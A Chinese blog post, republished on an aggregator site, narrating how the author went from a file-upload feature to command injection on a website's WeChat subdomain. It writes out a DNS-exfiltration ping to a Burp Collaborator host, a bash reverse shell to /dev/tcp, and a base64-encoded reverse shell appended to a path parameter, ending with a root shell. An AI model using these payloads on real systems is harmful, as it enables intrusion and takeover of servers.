首页 > Web开发 > 详细

从文件上传到命令注入

时间:2020-02-25 21:27:13      阅读:128      评论:0      收藏:0      [点我收藏+]

主站打开是这样的只有扫码登陆

技术分享图片

尝试扫码提示未注册

查看js,网站用了webpack打包

所有请求都在

技术分享图片

这个js里面

尝试寻找敏感接口无果

百度site:domain.com

技术分享图片

注意到wx1子域,打开这个链接跳转到在微信打开

技术分享图片

那就到微信打开,查看功能点发现一处上传,先上传正常图片

技术分享图片

改最下面的filename,后缀不变

技术分享图片

改上面的filename参数,发现应该是任意文件上传

技术分享图片

因为在js中发现php的ueditor(访问文件不存在)

技术分享图片

顾认为是php的站,于是上传php,成功上传

技术分享图片

访问此php文件直接被下载回来,没有解析(文件在主站下)

技术分享图片

此时想到的是这个目录不解析php文件,上传包中有一个path参数,想着将文件上传跨目录到网站根目录

先尝试随便命名一个文件夹,可以创建,访问文件也存在

技术分享图片

尝试../ ..跨目录失败

技术分享图片

技术分享图片

后面尝试各种姿势还是没能跨目录,也尝试修改上传URI

技术分享图片

把Image改为File,显示404

技术分享图片

改为upload还是在原来那个目录

技术分享图片

于是回头看,微信里的功能

技术分享图片

找到一处视频上传,把图片改为mp4后缀上传抓包,发包直接报错

技术分享图片

此时注意到报错返回的结果,是在执行视频解析的系统命令,注意到下面截图中的两个点

技术分享图片

因为path可控那我是不是可以直接拼接命令呢,于是尝试拼接

| ping `whoami`.z889xcgz67006o0itleim0vxcoie63.burpcollaborator.net | 

技术分享图片

dnslog收到响应whoami执行结果为root,此时确定存在命令执行

技术分享图片

直接反弹shell,服务器没收到

| bash -i >& /dev/tcp/123.*.*.182/8080 0>&1 |

技术分享图片

感觉是有特殊字符的原因,于是采用base64编码

tes.txt || echo YmFzaCAtaSA+JiAvZGV2L3*******uNTYuMjQuMTgyLzgwODAgMD4mMQ== | base64 -d | /bin/bash

监听的端口依然没收到响应

于是采用#注释后面的命令

tes.txt || echo YmFzaCAtaSA+JiAvZGV2L3*******uNTYuMjQuMTgyLzgwODAgMD4mMQ== | base64 -d | /bin/bash #

技术分享图片

技术分享图片

成功反弹shell,发现原来是node.js的站,难怪之前不解析

wx站

技术分享图片

主站

技术分享图片

此目录记录当时所做之尝试

技术分享图片

其实一开始就应该注意到

技术分享图片

Express是node.js的一个开发框架就不会在文件上传不解析那里搞那么久了

技术分享图片

从文件上传到命令注入

原文:https://www.cnblogs.com/cwkiller/p/12363796.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!